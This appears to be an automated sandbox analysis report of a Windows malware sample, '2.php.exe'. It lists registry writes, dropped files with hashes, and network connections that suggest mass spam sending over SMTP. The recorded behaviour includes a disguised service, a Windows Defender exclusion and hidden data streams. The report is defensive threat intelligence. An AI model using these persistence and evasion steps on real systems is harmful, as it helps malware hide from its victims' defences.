- Host Process for Windows Services
- Version
- 6.1.7600.16385 (win7_rtm.090713-1255)
Modules
| Image |
|---|
| c:\windows\syswow64\svchost.exe |
| c:\systemroot\system32\ntdll.dll |
| c:\systemroot\syswow64\ntdll.dll |
| c:\windows\system32\wow64.dll |
| c:\windows\system32\wow64win.dll |
| c:\windows\system32\wow64cpu.dll |
| c:\windows\system32\kernel32.dll |
| c:\windows\syswow64\kernel32.dll |
| c:\windows\system32\user32.dll |
| c:\windows\syswow64\kernelbase.dll |
| c:\windows\syswow64\ws2_32.dll |
| c:\windows\syswow64\msvcrt.dll |
| c:\windows\syswow64\rpcrt4.dll |
| c:\windows\syswow64\sspicli.dll |
| c:\windows\syswow64\cryptbase.dll |
| c:\windows\syswow64\sechost.dll |
| c:\windows\syswow64\nsi.dll |
| c:\windows\syswow64\user32.dll |
| c:\windows\syswow64\gdi32.dll |
| c:\windows\syswow64\lpk.dll |
| c:\windows\syswow64\usp10.dll |
| c:\windows\syswow64\advapi32.dll |
| c:\windows\syswow64\imm32.dll |
| c:\windows\syswow64\msctf.dll |
| c:\windows\syswow64\api-ms-win-core-synch-l1-2-0.dll |
| c:\windows\syswow64\powrprof.dll |
| c:\windows\syswow64\setupapi.dll |
| c:\windows\syswow64\cfgmgr32.dll |
| c:\windows\syswow64\oleaut32.dll |
| c:\windows\syswow64\ole32.dll |
| c:\windows\syswow64\devobj.dll |
| c:\windows\syswow64\mswsock.dll |
| c:\windows\syswow64\wshtcpip.dll |
| c:\windows\syswow64\wship6.dll |
| c:\windows\syswow64\wshqos.dll |
Registry activity
Total events
178
Read events
107
Write events
71
Delete events
0
Modification events
PID
Process
Operation
Key
Name
Value
1112
2.php.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
1112
2.php.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
1112
2.php.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
1112
2.php.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
2580
svchost.exe
write
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\qufzwyvo
ImagePath
C:\Windows\SysWOW64\qufzwyvo\irjirdhy.exe
2580
svchost.exe
write
HKEY_USERS\.DEFAULT\Control Panel\Buses
Config0
845B4A3D46F2EF0824EDB47D450DD49D084297DCE82E72BAA4992EFD74784E1DDB21115A81CD945D24EDB47D470DD49D024195DAF71261ADC06D04FDA6E22673BBC9154961CDA56917D985497439E3A5644490BDB57B2CEA9D5401C4FCBD54758DF21D5904FCA66915D880497534E59D084295D9E13F4BB4C06D06FDADFD542FD499440C3CFAAD6E11EDC70F3252A0F40948F490B57822E8905E02C5F7BD54718BCE15515BB9FD3041ED85497739E5A95419CC8F84A934D4A42E0B86918D541DE4AC743D04BAFB2F4FB2C70F320DD49D642DF4BD8418D17574E734FDC48D57D1F6AE743D04CCAD690ADF8753763AFAAE5C2DF4BD844D14DDA46D34FDC48D541DE4AD743D04CD945D24EDB47D440DD49D642DF4BD844D14DDA46D34FDC48D541DE4AD743D04CD705C24EDB5497723E6AE5503C093B24D14DDA46D34FDC48D541DE4AD743D04CD945D24EDB47D440DD49D642DF4BD844D14DDA46D34FDC48D541DE4AD743D04CD945D24EDB49D450DD4
2580
svchost.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
C:\Windows\SysWOW64\qufzwyvo
0
2748
netsh.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\65\52C64B7E
LanguageList
en-US
2748
netsh.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\65\52C64B7E
@%SystemRoot%\system32\eapqec.dll,-100
EAP Quarantine Enforcement Client
2748
netsh.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\65\52C64B7E
@%SystemRoot%\system32\eapqec.dll,-101
Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies.
2748
netsh.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\65\52C64B7E
@%SystemRoot%\system32\eapqec.dll,-102
1.0
2748
netsh.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\65\52C64B7E
@%SystemRoot%\system32\eapqec.dll,-103
Microsoft Corporation
2748
netsh.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\65\52C64B7E
@%SystemRoot%\system32\dhcpqec.dll,-100
DHCP Quarantine Enforcement Client
2748
netsh.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\65\52C64B7E
@%SystemRoot%\system32\dhcpqec.dll,-101
Provides DHCP based enforcement for NAP
2748
netsh.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\65\52C64B7E
@%SystemRoot%\system32\dhcpqec.dll,-103
1.0
2748
netsh.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\65\52C64B7E
@%SystemRoot%\system32\dhcpqec.dll,-102
Microsoft Corporation
2748
netsh.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\65\52C64B7E
@%SystemRoot%\system32\napipsec.dll,-1
IPsec Relying Party
2748
netsh.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\65\52C64B7E
@%SystemRoot%\system32\napipsec.dll,-2
Provides IPsec based enforcement for Network Access Protection
2748
netsh.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\65\52C64B7E
@%SystemRoot%\system32\napipsec.dll,-4
1.0
2748
netsh.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\65\52C64B7E
@%SystemRoot%\system32\napipsec.dll,-3
Microsoft Corporation
2748
netsh.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\65\52C64B7E
@%SystemRoot%\system32\tsgqec.dll,-100
RD Gateway Quarantine Enforcement Client
2748
netsh.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\65\52C64B7E
@%SystemRoot%\system32\tsgqec.dll,-101
Provides RD Gateway enforcement for NAP
2748
netsh.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\65\52C64B7E
@%SystemRoot%\system32\tsgqec.dll,-102
1.0
2748
netsh.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\65\52C64B7E
@%SystemRoot%\system32\tsgqec.dll,-103
Microsoft Corporation
Files activity
Executable files
2
Suspicious files
21
Text files
0
Unknown types
0
Dropped files
PID
Process
Filename
Type
1112
2.php.exe
C:\Users\admin\AppData\Local\Temp\irjirdhy.exe
executable
MD5:
23e31a25243ca40fd0362bb02aa6e893
SHA256:
bf2910e92a2e6489d8bc0a8240cea55c98ea507fe297a91a6c12816eb4a653c4
2248
cmd.exe
C:\Windows\SysWOW64\qufzwyvo\irjirdhy.exe
executable
MD5:
23e31a25243ca40fd0362bb02aa6e893
SHA256:
bf2910e92a2e6489d8bc0a8240cea55c98ea507fe297a91a6c12816eb4a653c4
2580
svchost.exe
C:\Windows\SysWOW64\config\systemprofile:.repos
binary
MD5:
342e9e67f779adbbe24ca79bea0f665f
SHA256:
bc49cca16f1fe3e34d3d73924922d1d20673d48aa522336669c8acc49b15d0e3
2580
svchost.exe
C:\Windows\SysWOW64\config\systemprofile:.repos
binary
MD5:
603b66dfda5be052494d7c1ed1a68e3b
SHA256:
90fdf5d91cd3e917ebe9e8258527e1d6fa5757b313ad5b9040da1ac5305cfefd
2580
svchost.exe
C:\Windows\SysWOW64\config\systemprofile:.repos
binary
MD5:
7656cc4d176d3f3200cc7238ba8ca7f5
SHA256:
a84ba72919f491d0a1c56e22eba1a08a4e04e676a80dec3748f5dbc7f175720e
2580
svchost.exe
C:\Windows\SysWOW64\config\systemprofile:.repos
binary
MD5:
178eb9dee4b5a03f0cb76db3d8521e5d
SHA256:
342bde70aac4eaa28c9881b0d9820b90b5ce16031809b175e087646ac4219438
2580
svchost.exe
C:\Windows\SysWOW64\config\systemprofile:.repos
binary
MD5:
1f7f0a15b459a272f41e89eed3c2acac
SHA256:
1209cb8f4655d328368dccb6df200a81e72672232612089f41ae1363c9be107b
2580
svchost.exe
C:\Windows\SysWOW64\config\systemprofile:.repos
binary
MD5:
4c9bb0b23e3ff214314a8a9fa889f8c9
SHA256:
cdb22af4d9c7504e86c1a22b7b484a2cf8b76b192bcc05f23ac3a88b3b5d3aa4
2580
svchost.exe
C:\Windows\SysWOW64\config\systemprofile:.repos
binary
MD5:
648c7a99c3206ca785176c878d4700f9
SHA256:
3db522e229bcf7be827bd7f50999ca08dfb80ecc7645e6a98bbf4b7437dbb1d5
2580
svchost.exe
C:\Windows\SysWOW64\config\systemprofile:.repos
binary
MD5:
a7c5761901f6bb753ba53a8ed4a40962
SHA256:
683927c343ba31074aebe8e2904b5fe24971e41c46b4d8af6ace88d140af9458
2580
svchost.exe
C:\Windows\SysWOW64\config\systemprofile:.repos
binary
MD5:
6a67c988d071361621d90abefe830658
SHA256:
9e3351f3e18cdd1575495069058ba1687ecc1c0d90823ab4908691a403d9f0c9
2580
svchost.exe
C:\Windows\SysWOW64\config\systemprofile:.repos
binary
MD5:
2bdcaf8383fe22194a243294106f7f02
SHA256:
47d74d4facb2b570ab10d96886a18e34b3653ca3b40714398518474879eb5a2f
2580
svchost.exe
C:\Windows\SysWOW64\config\systemprofile:.repos
binary
MD5:
2ba67809fee8650fb1e9591d51fc1e42
SHA256:
615945351974d305b93f163e5dc05d4675b0956b35f88183d83ec0056d14c729
2580
svchost.exe
C:\Windows\SysWOW64\config\systemprofile:.repos
binary
MD5:
6b1378837d84645319e03965cfe63a8c
SHA256:
634db1a1e7e4260b50000d810edf8aeff982142c287ba9636afdbc0d78553d45
2580
svchost.exe
C:\Windows\SysWOW64\config\systemprofile:.repos
binary
MD5:
b21f0c5804e8a750000c2a4f4a07dcbd
SHA256:
a2978d9c9561ca9e7ffdb12ef3a60deecf0313d55e0b4137a8363bd0da216ceb
2580
svchost.exe
C:\Windows\SysWOW64\config\systemprofile:.repos
binary
MD5:
8147cc343d8000a4fec5962301db938a
SHA256:
60aab26861794a164d793e17dc99a2f8e9004a875d3d0e4b1ed2581adddc4797
2580
svchost.exe
C:\Windows\SysWOW64\config\systemprofile:.repos
binary
MD5:
7cd6543c4e94e52635d3ab0a529427ec
SHA256:
5f0e183d872a1dd58dc8a34e367f85e1ebc19a95d79f596ce632cd9f28c39181
2580
svchost.exe
C:\Windows\SysWOW64\config\systemprofile:.repos
binary
MD5:
11b4860e89c672f6d5a94aea5e8c8550
SHA256:
359c1af419a1ea5520d8db97706c6b9d11af88b0dc0e938ff3fdd6ba37b4a2e0
2580
svchost.exe
C:\Windows\SysWOW64\config\systemprofile:.repos
binary
MD5:
f1f167574f3bb39659c70ba791ee5eab
SHA256:
7bb669dc8b687a174b3269fa14367674f0e8b432775955f7fdd358ecc09f44b3
2580
svchost.exe
C:\Windows\SysWOW64\config\systemprofile:.repos
binary
MD5:
b53c91d739559229309715ba1c4ae579
SHA256:
08851b05108f2af26b53c77bdb00e23a08af86b91200b59594ebce05b662480a
2580
svchost.exe
C:\Windows\SysWOW64\config\systemprofile:.repos
binary
MD5:
e25e5ab236a1c84686301f5cd4cc9dff
SHA256:
2074fc158c99520a93147cf100305330711ed6f09467d0ec862f36fa813d7635
2580
svchost.exe
C:\Windows\SysWOW64\config\systemprofile:.repos
binary
MD5:
0256c515a35da2a8c39d789f9caace35
SHA256:
6d7ca4a3fee72f40a32ee45c5672e57ff4259aeb363f1623f790a97e33b03398
2580
svchost.exe
C:\Windows\SysWOW64\config\systemprofile:.repos
binary
MD5:
eed8e747796deb52fb94c454b9b37225
SHA256:
f536d35959c714ca048db456322fcbf7a38a1e9109a72043874d9a44acb9961b
Network activity
HTTP(S) requests
5
TCP/UDP connections
547
DNS requests
453
Threats
14
HTTP requests
| PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
| 2580 | svchost.exe | GET | 302 | 172.217.22.4:80 | http://www.google.com/ | US |
html
|
|
whitelisted |
| 2580 | svchost.exe | GET | 302 | 172.217.22.4:80 | http://www.google.com/ | US |
html
|
|
whitelisted |
| 2580 | svchost.exe | GET | 302 | 172.217.22.4:80 | http://www.google.com/ | US |
html
|
|
whitelisted |
| 2580 | svchost.exe | GET | 302 | 172.217.22.4:80 | http://www.google.com/ | US |
html
|
|
whitelisted |
| 2580 | svchost.exe | GET | 302 | 172.217.22.4:80 | http://www.google.com/ | US |
html
|
|
whitelisted |
Connections
| PID | Process | IP | ASN | CN | Reputation |
|---|---|---|---|---|---|
| 2580 | svchost.exe | 40.113.200.201:80 | Microsoft Corporation | US | malicious |
| 2580 | svchost.exe | 104.47.53.36:25 | Microsoft Corporation | US | unknown |
| 2580 | svchost.exe | 43.231.4.7:443 | Gigabit Hosting Sdn Bhd | MY | malicious |
| 2580 | svchost.exe | 67.195.228.111:25 | Yahoo | US | unknown |
| 2580 | svchost.exe | 94.23.27.38:484 | OVH SAS | FR | malicious |
| 2580 | svchost.exe | 108.177.14.27:25 | Google Inc. | US | whitelisted |
| 2580 | svchost.exe | 65.20.0.49:25 | Critical Path GmbH | US | unknown |
| 2580 | svchost.exe | 108.177.15.26:25 | Google Inc. | US | whitelisted |
| 2580 | svchost.exe | 104.47.38.33:25 | Microsoft Corporation | US | whitelisted |
| 2580 | svchost.exe | 91.90.154.79:25 | MIVITEC GmbH | DE | unknown |
| 2580 | svchost.exe | 173.194.73.27:25 | Google Inc. | US | unknown |
| 2580 | svchost.exe | 94.100.180.104:25 | Limited liability company Mail.Ru | RU | unknown |
| 2580 | svchost.exe | 37.221.193.144:25 | netcup GmbH | DE | unknown |
| 2580 | svchost.exe | 194.109.24.132:25 | Xs4all Internet BV | NL | unknown |
| 2580 | svchost.exe | 148.163.148.167:25 | Proofpoint, Inc. | US | unknown |
| 2580 | svchost.exe | 217.70.32.121:25 | Levonline AB | SE | unknown |
| 2580 | svchost.exe | 77.75.76.42:25 | Seznam.cz, a.s. | CZ | unknown |
| 2580 | svchost.exe | 74.125.23.27:25 | Google Inc. | US | unknown |
| 2580 | svchost.exe | 144.76.199.43:428 | Hetzner Online GmbH | DE | malicious |
| 2580 | svchost.exe | 144.76.199.2:428 | Hetzner Online GmbH | DE | malicious |
| 2580 | svchost.exe | 85.25.119.25:428 | Host Europe GmbH | DE | malicious |
| 2580 | svchost.exe | 46.4.52.109:428 | Hetzner Online GmbH | DE | unknown |
| 2580 | svchost.exe | 176.111.49.43:428 | United Networks of Ukraine, Ltd | UA | malicious |
| 2580 | svchost.exe | 172.217.22.4:80 | Google Inc. | US | whitelisted |
| 2580 | svchost.exe | 213.180.204.89:25 | YANDEX LLC | RU | unknown |
| 2580 | svchost.exe | 104.47.36.33:25 | Microsoft Corporation | US | unknown |
| 2580 | svchost.exe | 91.195.240.126:25 | SEDO GmbH | DE | malicious |
| 2580 | svchost.exe | 213.120.69.89:25 | British Telecommunications PLC | GB | unknown |
| 2580 | svchost.exe | 87.250.250.89:25 | YANDEX LLC | RU | unknown |
| 2528 | svchost.exe | 185.181.165.20:8087 | euro Lir LLC | UA | suspicious |
| 2580 | svchost.exe | 104.47.9.33:25 | Microsoft Corporation | US | whitelisted |
| 2580 | svchost.exe | 159.220.38.15:25 | Thomson Reuters Ireland Limited | US | unknown |
| 2580 | svchost.exe | 87.138.165.4:25 | Deutsche Telekom AG | DE | unknown |
| 2580 | svchost.exe | 52.206.72.46:25 | Amazon.com, Inc. | US | unknown |
| 2580 | svchost.exe | 104.47.8.33:25 | Microsoft Corporation | NL | whitelisted |
| 2580 | svchost.exe | 52.223.198.11:443 | Twitch Interactive Inc. | NL | unknown |
| 2580 | svchost.exe | 104.47.4.36:25 | Microsoft Corporation | NL | unknown |
| 2580 | svchost.exe | 145.14.159.241:25 | Hostinger International Limited | US | malicious |
| 2580 | svchost.exe | 148.163.153.138:25 | Proofpoint, Inc. | US | unknown |
| 2580 | svchost.exe | 66.60.192.46:25 | NU-Telecom | US | unknown |
| 2580 | svchost.exe | 109.70.27.133:25 | Jsc ru-center | RU | unknown |
| 2580 | svchost.exe | 67.219.251.58:25 | MessageLabs Inc. | US | unknown |
| 2580 | svchost.exe | 74.125.140.26:25 | Google Inc. | US | whitelisted |
| 2580 | svchost.exe | 104.47.6.33:25 | Microsoft Corporation | US | whitelisted |
| 2580 | svchost.exe | 188.125.73.87:25 | CH | unknown | |
| 2580 | svchost.exe | 81.19.78.67:25 | Rambler Internet Holding LLC | RU | unknown |
| 2580 | svchost.exe | 98.137.157.43:25 | Yahoo | US | unknown |
| 2580 | svchost.exe | 67.231.154.162:25 | Proofpoint, Inc. | US | unknown |
| 2580 | svchost.exe | 82.57.200.133:25 | Telecom Italia | IT | unknown |
| 2580 | svchost.exe | 216.58.207.68:443 | Google Inc. | US | whitelisted |
| 2580 | svchost.exe | 212.82.101.46:25 | Yahoo! UK Services Limited | CH | shared |
| 2580 | svchost.exe | 104.47.41.33:25 | Microsoft Corporation | US | whitelisted |
| 2580 | svchost.exe | 168.95.5.117:25 | Data Communication Business Group | TW | unknown |
| 2580 | svchost.exe | 185.164.14.87:25 | One.com A/S | DK | unknown |
| 2580 | svchost.exe | 125.209.238.100:25 | NBP | KR | unknown |
| 2580 | svchost.exe | 87.250.250.22:443 | YANDEX LLC | RU | unknown |
| 2580 | svchost.exe | 213.120.69.2:25 | British Telecommunications PLC | GB | unknown |
| 2580 | svchost.exe | 106.10.248.75:25 | internet content provider | SG | unknown |
| 2580 | svchost.exe | 216.228.237.47:25 | Internap Network Services Corporation | US | unknown |
| 2580 | svchost.exe | 104.47.33.33:25 | Microsoft Corporation | US | unknown |
| 2580 | svchost.exe | 74.125.68.26:25 | Google Inc. | US | whitelisted |
| 2580 | svchost.exe | 64.136.44.37:25 | Netzero,INC. | US | unknown |
| 2580 | svchost.exe | 194.69.195.168:25 | IMA'DIFF s.a.r.l. | FR | unknown |
| 2580 | svchost.exe | 91.198.130.237:25 | OOO Nord-Telecom | RU | unknown |
| 2580 | svchost.exe | 212.227.17.5:25 | 1&1 Internet SE | DE | unknown |
| 2580 | svchost.exe | 61.47.47.151:25 | Pacific Internet (Thailand) Ltd | SG | unknown |
| 2580 | svchost.exe | 168.95.5.219:25 | Data Communication Business Group | TW | unknown |
| 2580 | svchost.exe | 104.47.46.33:25 | Microsoft Corporation | US | whitelisted |
| 2580 | svchost.exe | 76.12.212.238:25 | HostMySite | US | unknown |
| 2580 | svchost.exe | 69.172.229.252:25 | Peer 1 Network (USA) Inc. | US | unknown |
| 2580 | svchost.exe | 104.47.37.33:25 | Microsoft Corporation | US | whitelisted |
| 2580 | svchost.exe | 64.29.145.41:25 | InternetNamesForBusiness.com | US | unknown |
| 2580 | svchost.exe | 209.222.82.132:25 | Barracuda Networks, Inc. | US | unknown |
| 2580 | svchost.exe | 62.113.100.30:25 | Zenon N.S.P. | RU | unknown |
| 2580 | svchost.exe | 168.95.6.62:25 | Data Communication Business Group | TW | unknown |
| 2580 | svchost.exe | 212.214.85.72:25 | Tele2 SWIPnet | SE | unknown |
| 2580 | svchost.exe | 65.39.211.20:25 | Peer 1 Network (USA) Inc. | CA | unknown |
| 2580 | svchost.exe | 195.178.185.14:25 | Bahnhof Internet AB | SE | unknown |
| 2580 | svchost.exe | 66.218.85.52:25 | Yahoo! | US | unknown |
| 2580 | svchost.exe | 173.194.73.26:25 | Google Inc. | US | unknown |
| 2580 | svchost.exe | 212.48.78.1:25 | Host Europe GmbH | GB | unknown |
| 2580 | svchost.exe | 89.17.62.6:25 | Intinform Ltd. | RU | unknown |
| 2580 | svchost.exe | 194.186.45.245:25 | PVimpelCom | RU | unknown |
| 2580 | svchost.exe | 104.47.1.33:25 | Microsoft Corporation | AT | whitelisted |
| 2580 | svchost.exe | 13.86.35.249:25 | Microsoft Corporation | US | unknown |
| 2580 | svchost.exe | 64.233.166.26:25 | Google Inc. | US | whitelisted |
| 2580 | svchost.exe | 192.252.156.19:25 | Savvis | US | unknown |
| 2580 | svchost.exe | 125.209.222.14:25 | NBP | KR | unknown |
| 2580 | svchost.exe | 31.31.194.100:25 | Domain names registrar REG.RU, Ltd | RU | unknown |
| 2580 | svchost.exe | 184.106.54.1:25 | Rackspace Ltd. | US | unknown |
| 2580 | svchost.exe | 104.47.2.33:25 | Microsoft Corporation | IE | whitelisted |
| 2580 | svchost.exe | 207.69.189.229:25 | Earthlink, Inc. | US | unknown |
| 2580 | svchost.exe | 103.112.211.53:25 | –– | unknown | |
| 2580 | svchost.exe | 104.47.0.33:25 | Microsoft Corporation | FI | whitelisted |
| 2580 | svchost.exe | 34.236.1.24:25 | Amazon.com, Inc. | US | unknown |
| 2580 | svchost.exe | 80.67.18.126:25 | Host Europe GmbH | DE | unknown |
| 2580 | svchost.exe | 104.47.12.33:25 | Microsoft Corporation | IE | whitelisted |
| 2580 | svchost.exe | 67.231.156.149:25 | Proofpoint, Inc. | US | unknown |
| 2580 | svchost.exe | 194.87.167.23:25 | RU | unknown | |
| 2580 | svchost.exe | 66.60.193.46:25 | NU-Telecom | US | unknown |
| 2580 | svchost.exe | 54.219.191.21:25 | Amazon.com, Inc. | US | unknown |
| 2580 | svchost.exe | 62.149.178.10:25 | Aruba S.p.A. | IT | unknown |
| 2580 | svchost.exe | 94.100.180.180:25 | Limited liability company Mail.Ru | RU | unknown |
| 2580 | svchost.exe | 89.146.30.19:25 | Routit BV | NL | unknown |
| –– | –– | 94.23.27.38:484 | OVH SAS | FR | malicious |
| 2580 | svchost.exe | 203.13.40.16:25 | PDR | IN | unknown |
| 2580 | svchost.exe | 67.231.148.150:25 | Proofpoint, Inc. | US | unknown |
| 2580 | svchost.exe | 104.47.45.33:25 | Microsoft Corporation | US | whitelisted |
| 2580 | svchost.exe | 212.54.58.11:25 | Ziggo | NL | unknown |
| 2580 | svchost.exe | 213.205.33.63:25 | Tiscali SpA | IT | unknown |
| 2580 | svchost.exe | 23.254.202.115:25 | Hostwinds LLC. | US | unknown |
| 2580 | svchost.exe | 72.52.216.251:25 | Liquid Web, L.L.C | US | unknown |
| 2580 | svchost.exe | 74.125.68.27:25 | Google Inc. | US | whitelisted |
| 2580 | svchost.exe | 144.76.173.228:25 | Hetzner Online GmbH | DE | unknown |
| 2580 | svchost.exe | 104.47.44.33:25 | Microsoft Corporation | US | whitelisted |
| 2580 | svchost.exe | 109.70.1.156:25 | LeaseWeb Netherlands B.V. | NL | unknown |
| 2580 | svchost.exe | 104.27.158.118:25 | Cloudflare Inc | US | shared |
| 2580 | svchost.exe | 64.8.70.104:25 | Synacor, Inc. | US | unknown |
| 2580 | svchost.exe | 194.186.47.93:25 | PVimpelCom | RU | unknown |
| 2580 | svchost.exe | 212.29.227.84:25 | 013 NetVision Ltd | IL | unknown |
| 2580 | svchost.exe | 74.208.5.20:25 | 1&1 Internet SE | US | unknown |
| 2580 | svchost.exe | 210.55.143.33:25 | Global-Gateway Internet | NZ | unknown |
| 2580 | svchost.exe | 94.137.227.51:25 | UGMK-Telecom LLC | RU | unknown |
| 2580 | svchost.exe | 194.25.134.72:25 | Deutsche Telekom AG | DE | unknown |
| 2580 | svchost.exe | 80.73.164.148:25 | ArtX LLC | RU | unknown |
| 2580 | svchost.exe | 159.69.43.58:25 | US | unknown | |
| 2580 | svchost.exe | 203.205.219.57:25 | CN | unknown | |
| 2580 | svchost.exe | 196.15.131.133:25 | SAIX-NET | ZA | unknown |
| 2580 | svchost.exe | 216.55.149.41:25 | InternetNamesForBusiness.com | US | unknown |
| 2580 | svchost.exe | 213.205.33.62:25 | Tiscali SpA | IT | unknown |
| 2580 | svchost.exe | 200.13.249.116:25 | EPM Telecomunicaciones S.A. E.S.P. | CO | unknown |
| 2580 | svchost.exe | 212.227.15.17:25 | 1&1 Internet SE | DE | unknown |
| 2580 | svchost.exe | 94.100.180.31:25 | Limited liability company Mail.Ru | RU | unknown |
| 2580 | svchost.exe | 185.164.14.102:25 | One.com A/S | DK | unknown |
| 2580 | svchost.exe | 157.205.238.165:25 | Otsuka Corp. | JP | unknown |
| 2580 | svchost.exe | 98.137.159.27:25 | Yahoo | US | unknown |
| 2580 | svchost.exe | 200.98.245.63:25 | Universo Online S.A. | BR | unknown |
| 2580 | svchost.exe | 185.26.156.53:25 | uvensys GmbH | DE | unknown |
| 2580 | svchost.exe | 94.100.132.100:25 | MK Netzdienste GmbH & Co. KG | DE | unknown |
| 2580 | svchost.exe | 31.204.155.105:25 | i3D.net B.V | NL | unknown |
| 2580 | svchost.exe | 162.253.224.6:25 | SingleHop, Inc. | US | suspicious |
| 2580 | svchost.exe | 216.6.136.131:25 | Alteva Inc | US | unknown |
| 2580 | svchost.exe | 172.217.18.4:443 | Google Inc. | US | whitelisted |
| 2580 | svchost.exe | 195.62.185.201:25 | Lepida S.p.A. | IT | unknown |
| 2580 | svchost.exe | 177.153.23.242:25 | Locaweb Serviços de Internet S/A | BR | unknown |
| 2580 | svchost.exe | 144.160.159.21:25 | AT&T Services, Inc. | US | unknown |
| 2580 | svchost.exe | 211.231.108.176:25 | Kakao Corp | KR | unknown |
| 2580 | svchost.exe | 89.97.204.43:25 | Fastweb | IT | unknown |
| 2580 | svchost.exe | 104.219.251.107:25 | Namecheap, Inc. | US | suspicious |
| 2580 | svchost.exe | 134.247.141.91:25 | Flughafen Muenchen GmbH | DE | unknown |
| 2580 | svchost.exe | 208.84.244.133:25 | Terra Networks Operations Inc. | US | unknown |
| 2580 | svchost.exe | 74.6.137.45:25 | Yahoo! | US | unknown |
| 2580 | svchost.exe | 188.40.58.4:25 | Hetzner Online GmbH | DE | unknown |
| 2580 | svchost.exe | 213.209.1.129:25 | Italiaonline S.p.A. | IT | unknown |
| 2580 | svchost.exe | 173.248.187.16:25 | Handy Networks, LLC | US | unknown |
| 2580 | svchost.exe | 134.93.178.242:25 | Johannes Gutenberg-Universitaet Mainz | DE | unknown |
| 2580 | svchost.exe | 104.47.14.36:25 | Microsoft Corporation | AT | unknown |
| 2580 | svchost.exe | 116.90.57.94:25 | Digital Pacific Pty Ltd Australia | AU | unknown |
| 2580 | svchost.exe | 196.11.134.205:25 | FIRST-NATIONAL | ZA | unknown |
| 2580 | svchost.exe | 200.81.186.15:25 | SION S.A | AR | unknown |
DNS requests
| Domain | IP | Reputation |
|---|---|---|
| microsoft.com | 40.113.200.201
104.215.148.63 13.77.161.179 40.76.4.15 40.112.72.205 |
whitelisted |
| microsoft-com.mail.protection.outlook.com | 104.47.53.36
|
shared |
| yahoo.com | No response | whitelisted |
| mta6.am0.yahoodns.net | 67.195.228.111
66.218.85.139 98.137.159.28 74.6.137.63 98.137.159.26 67.195.228.94 67.195.228.110 74.6.137.65 |
unknown |
| 121.154.204.31.dnsbl.sorbs.net | No response | unknown |
| gmail.com | No response | shared |
| 121.154.204.31.bl.spamcop.net | No response | unknown |
| alt1.gmail-smtp-in.l.google.com | 108.177.14.27
|
whitelisted |
| trishiz.com | No response | unknown |
| 121.154.204.31.zen.spamhaus.org | No response | unknown |
| 121.154.204.31.sbl-xbl.spamhaus.org | No response | unknown |
| 121.154.204.31.cbl.abuseat.org | No response | unknown |
| btinternet.com | No response | unknown |
| mx.lb.btinternet.com | 65.20.0.49
|
unknown |
| elenaphoto.ru | No response | unknown |
| aspmx.l.google.com | 108.177.15.26
|
whitelisted |
| tanner.de | No response | unknown |
| hotmail.com | No response | malicious |
| mx0078.ppsmtp.de | 91.90.154.79
|
unknown |
| hotmail-com.olc.protection.outlook.com | 104.47.38.33
104.47.37.33 |
shared |
| thegalecompany.com | No response | unknown |
| ALT1.ASPMX.L.GOOGLE.COM | 173.194.73.27
|
whitelisted |
| rosen.cl | No response | unknown |
| mail.ru | No response | whitelisted |
| mxs.mail.ru | 94.100.180.104
94.100.180.31 |
shared |
| tyz.ru | No response | unknown |
| x9media.de | No response | unknown |
| mail.x9media.de | 37.221.193.144
|
unknown |
| ssigroup.com | No response | unknown |
| mxa-00172102.gslb.pphosted.com | 148.163.148.167
|
unknown |
| xs4all.nl | No response | unknown |
| mx1.xs4all.nl | 194.109.24.132
|
unknown |
| mercon.se | No response | unknown |
| smtp.levonline.com | 217.70.32.121
217.70.32.122 |
unknown |
| seznam.cz | No response | unknown |
| mx1.seznam.cz | 77.75.76.42
77.75.78.42 |
unknown |
| google.com | No response | whitelisted |
| alt3.aspmx.l.google.com | 74.125.23.27
|
whitelisted |
| www.google.com | 172.217.22.4
|
whitelisted |
| yandex.ru | No response | whitelisted |
| mx.yandex.ru | 213.180.204.89
77.88.21.89 87.250.250.89 93.158.134.89 213.180.193.89 |
whitelisted |
| salazarisrael.cl | No response | unknown |
| ematte.se | No response | unknown |
| atelco.de | No response | unknown |
| smtp.amaris.de | 91.195.240.126
|
malicious |
| lmc.ru | No response | unknown |
| mx.yandex.net | 87.250.250.89
93.158.134.89 213.180.204.89 77.88.21.89 213.180.193.89 |
whitelisted |
| yourheregps.com | No response | unknown |
| akerstrom.se | No response | unknown |
| thomsonreuters.com | No response | whitelisted |
| mx.mail.thomsonreuters.com | 159.220.38.15
|
unknown |
| kaestl.de | No response | unknown |
| webmail.kaestl.de | 87.138.165.4
|
unknown |
| 121.154.204.31.in-addr.arpa | No response | unknown |
| seawayvalley.com | No response | unknown |
| spamgateway.corusent.com | 52.206.72.46
|
unknown |
| fazendo.ru | No response | unknown |
| sbmpei.ru | No response | unknown |
| live.co.za | No response | unknown |
| eur.olc.protection.outlook.com | 104.47.8.33
104.47.10.33 |
whitelisted |
| gfk.se | No response | unknown |
